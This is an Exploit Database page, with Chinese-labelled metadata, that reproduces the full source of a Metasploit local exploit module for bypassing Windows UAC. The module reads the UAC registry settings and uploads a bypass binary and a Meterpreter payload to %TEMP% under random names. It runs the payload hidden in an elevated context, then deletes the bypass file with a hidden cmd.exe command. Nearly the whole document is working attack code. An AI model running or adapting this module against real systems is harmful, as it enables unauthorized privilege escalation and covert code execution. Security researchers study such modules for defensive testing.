Microsoft Windows – Escalate UAC Protection Bypass (Metasploit)

• Exploit Database
• 146 阅读

• 作者： Metasploit
  日期： 2012-10-10
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/21845/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151

  ## # $Id$ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking   include Post::Common include Exploit::EXE include Post::File   def initialize(info={}) super( update_info( info, &apos;Name&apos;=> &apos;Windows Escalate UAC Protection Bypass&apos;, &apos;Description&apos; => %q{ This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off. }, &apos;License&apos; => MSF_LICENSE, &apos;Author&apos;=> [ &apos;David Kennedy "ReL1K" <kennedyd013[at]gmail.com>&apos;, &apos;mitnick&apos;, &apos;mubix <mubix[at]hak5.org>&apos; # Port to local exploit ], &apos;Version&apos; => &apos;$Revision$&apos;, &apos;Platform&apos;=> [ &apos;windows&apos; ], &apos;SessionTypes&apos;=> [ &apos;meterpreter&apos; ], &apos;Targets&apos; => [ [ &apos;Windows&apos;, {} ] ], &apos;DefaultTarget&apos; => 0, &apos;References&apos;=> [ [ &apos;URL&apos;, &apos; http://www.trustedsec.com/december-2010/bypass-windows-uac/&apos; ] ], &apos;DisclosureDate&apos;=> "Dec 31, 2010" ))   end   def exploit     # # Verify use against Vista+ # vuln = false winver = sysinfo["OS"] affected = [ &apos;Windows Vista&apos;, &apos;Windows 7&apos;, &apos;Windows 2008&apos; ] affected.each { |v| if winver.include? v vuln = true end } if not vuln print_error("#{winver} does not have UAC") return end   root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System") open_key = session.sys.registry.open_key(root_key, base_key) lua_setting = open_key.query_value(&apos;EnableLUA&apos;)   if lua_setting.data == 1 print_status "UAC is Enabled, checking level..." else print_error "UAC is not enabled, no reason to run module, exiting..." print_error "Run exploit/windows/local/ask to elevate" return end   uac_level = open_key.query_value(&apos;ConsentPromptBehaviorAdmin&apos;)   case uac_level.data when 2 print_error "UAC is set to &apos;Always Notify&apos;" print_error "This module does not bypass this setting, exiting..." return when 5 print_good "UAC is set to Default" print_good "BypassUAC can bypass this setting, continuing..." when 0 print_error "UAC is not enabled, no reason to run module" print_error "Run exploit/windows/local/ask to elevate" return end   # # Generate payload and random names for upload # payload = generate_payload_exe   # randomize the bypass_uac_filename bypass_uac_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"   # randomize the payload exe name payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"   # path to the bypassuac binary path = ::File.join(Msf::Config.install_root, "data", "post")   # decide, x86 or x64 bpexe = nil if sysinfo["Architecture"] =~ /wow64/i bpexe = ::File.join(path, "bypassuac-x64.exe") else bpexe = ::File.join(path, "bypassuac-x86.exe") end   tmpdir = session.fs.file.expand_path("%TEMP%") cmd = "#{tmpdir}\\#{bypass_uac_filename} /c %TEMP%\\#{payload_filename}"   print_status("Uploading the bypass UAC executable to the filesystem...")   begin # # Upload UAC bypass to the filesystem # session.fs.file.upload_file("%TEMP%\\#{bypass_uac_filename}", bpexe) print_status("Meterpreter stager executable #{payload.length} bytes long being uploaded..") # # Upload the payload to the filesystem # tempexe = tmpdir + "\\" + payload_filename fd = client.fs.file.new(tempexe, "wb") fd.write(payload) fd.close rescue ::Exception => e print_error("Error uploading file #{bypass_uac_filename}: #{e.class} #{e}") return end   print_status("Uploaded the agent to the filesystem....")   # execute the payload session.sys.process.execute(cmd, nil, {&apos;Hidden&apos; => true})   # delete the uac bypass payload delete_file = "cmd.exe /c del #{tmpdir}\\#{bypass_uac_filename}"   session.sys.process.execute(delete_file, nil, {&apos;Hidden&apos; => true}) end end